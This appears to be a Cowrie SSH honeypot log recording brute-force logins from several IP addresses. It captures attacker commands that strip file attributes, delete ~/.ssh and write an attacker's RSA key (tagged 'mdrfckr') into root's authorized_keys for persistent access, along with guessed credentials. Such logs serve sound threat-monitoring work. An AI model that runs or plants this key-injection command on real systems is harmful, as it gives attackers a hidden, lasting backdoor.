{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:42:13.023628Z","src_ip":"212.227.235.229","session":"e12dfc06ce1f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:42:13.104459Z","src_ip":"212.227.235.229","session":"e12dfc06ce1f"}
{"eventid":"cowrie.login.success","username":"root","password":"123456xx","message":"login attempt [root/123456xx] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:42:13.471130Z","src_ip":"212.227.235.229","session":"e12dfc06ce1f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:42:13.690184Z","src_ip":"212.227.235.229","session":"e12dfc06ce1f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:42:13.690899Z","src_ip":"212.227.235.229","session":"e12dfc06ce1f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:42:13.691826Z","src_ip":"212.227.235.229","session":"e12dfc06ce1f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:42:13.773651Z","src_ip":"212.227.235.229","session":"e12dfc06ce1f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:42:13.952653Z","src_ip":"212.227.235.229","session":"e12dfc06ce1f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:42:13.953319Z","src_ip":"212.227.235.229","session":"e12dfc06ce1f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:42:14.037098Z","src_ip":"212.227.235.229","session":"e12dfc06ce1f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:42:14.037993Z","src_ip":"212.227.235.229","session":"e12dfc06ce1f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54252,"dst_ip":"1.2.3.4","dst_port":22,"session":"b85853356c07","protocol":"ssh","message":"New connection: 212.227.235.229:54252 (1.2.3.4:22) [session: b85853356c07]","sensor":"my-vps","timestamp":"2025-09-09T05:42:14.113308Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:42:14.113988Z","src_ip":"212.227.235.229","session":"b85853356c07"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:42:14.191737Z","src_ip":"212.227.235.229","session":"b85853356c07"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:42:14.545811Z","src_ip":"212.227.235.229","session":"b85853356c07"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:42:15.627189Z","src_ip":"212.227.235.229","session":"b85853356c07"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54264,"dst_ip":"1.2.3.4","dst_port":22,"session":"8842bb7ffce4","protocol":"ssh","message":"New connection: 212.227.235.229:54264 (1.2.3.4:22) [session: 8842bb7ffce4]","sensor":"my-vps","timestamp":"2025-09-09T05:42:15.706790Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:42:15.707519Z","src_ip":"212.227.235.229","session":"8842bb7ffce4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:42:15.788428Z","src_ip":"212.227.235.229","session":"8842bb7ffce4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:42:16.151228Z","src_ip":"212.227.235.229","session":"8842bb7ffce4"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:42:16.233187Z","src_ip":"212.227.235.229","session":"8842bb7ffce4"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:42:16.234400Z","src_ip":"212.227.235.229","session":"e12dfc06ce1f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44778,"dst_ip":"1.2.3.4","dst_port":22,"session":"5ae6fc457aee","protocol":"ssh","message":"New connection: 212.227.235.229:44778 (1.2.3.4:22) [session: 5ae6fc457aee]","sensor":"my-vps","timestamp":"2025-09-09T05:42:30.092376Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:42:30.093959Z","src_ip":"212.227.235.229","session":"5ae6fc457aee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:42:30.346477Z","src_ip":"212.227.235.229","session":"5ae6fc457aee"}
{"eventid":"cowrie.login.success","username":"root","password":"april","message":"login attempt [root/april] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:42:31.150374Z","src_ip":"212.227.235.229","session":"5ae6fc457aee"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:42:31.559874Z","src_ip":"212.227.235.229","session":"5ae6fc457aee"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:42:31.560554Z","src_ip":"212.227.235.229","session":"5ae6fc457aee"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:42:31.561817Z","src_ip":"212.227.235.229","session":"5ae6fc457aee"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:42:31.743661Z","src_ip":"212.227.235.229","session":"5ae6fc457aee"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:42:32.147389Z","src_ip":"212.227.235.229","session":"5ae6fc457aee"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:42:32.148051Z","src_ip":"212.227.235.229","session":"5ae6fc457aee"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:42:32.326573Z","src_ip":"212.227.235.229","session":"5ae6fc457aee"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:42:32.327450Z","src_ip":"212.227.235.229","session":"5ae6fc457aee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46198,"dst_ip":"1.2.3.4","dst_port":22,"session":"049c46d6a7bc","protocol":"ssh","message":"New connection: 212.227.235.229:46198 (1.2.3.4:22) [session: 049c46d6a7bc]","sensor":"my-vps","timestamp":"2025-09-09T05:42:32.493606Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:42:32.494508Z","src_ip":"212.227.235.229","session":"049c46d6a7bc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:42:32.664307Z","src_ip":"212.227.235.229","session":"049c46d6a7bc"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:42:33.385276Z","src_ip":"212.227.235.229","session":"049c46d6a7bc"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:42:34.559512Z","src_ip":"212.227.235.229","session":"049c46d6a7bc"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":32810,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8566e0f539a","protocol":"ssh","message":"New connection: 92.118.39.62:32810 (1.2.3.4:22) [session: e8566e0f539a]","sensor":"my-vps","timestamp":"2025-09-09T05:42:34.680230Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T05:42:34.681174Z","src_ip":"92.118.39.62","session":"e8566e0f539a"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T05:42:34.711323Z","src_ip":"92.118.39.62","session":"e8566e0f539a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46832,"dst_ip":"1.2.3.4","dst_port":22,"session":"16bf16d3e663","protocol":"ssh","message":"New connection: 212.227.235.229:46832 (1.2.3.4:22) [session: 16bf16d3e663]","sensor":"my-vps","timestamp":"2025-09-09T05:42:34.744463Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:42:34.745717Z","src_ip":"212.227.235.229","session":"16bf16d3e663"}
{"eventid":"cowrie.login.failed","username":"arkserver","password":"arkserver","message":"login attempt [arkserver/arkserver] failed","sensor":"my-vps","timestamp":"2025-09-09T05:42:34.803639Z","src_ip":"92.118.39.62","session":"e8566e0f539a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:42:34.926314Z","src_ip":"212.227.235.229","session":"16bf16d3e663"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:42:35.685030Z","src_ip":"212.227.235.229","session":"16bf16d3e663"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:42:35.835593Z","src_ip":"92.118.39.62","session":"e8566e0f539a"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:42:35.863363Z","src_ip":"212.227.235.229","session":"5ae6fc457aee"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:42:35.865520Z","src_ip":"212.227.235.229","session":"16bf16d3e663"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":61213,"dst_ip":"1.2.3.4","dst_port":22,"session":"9dbdcc7cf98d","protocol":"ssh","message":"New connection: 213.6.203.226:61213 (1.2.3.4:22) [session: 9dbdcc7cf98d]","sensor":"my-vps","timestamp":"2025-09-09T05:43:11.981602Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:43:11.982629Z","src_ip":"213.6.203.226","session":"9dbdcc7cf98d"}
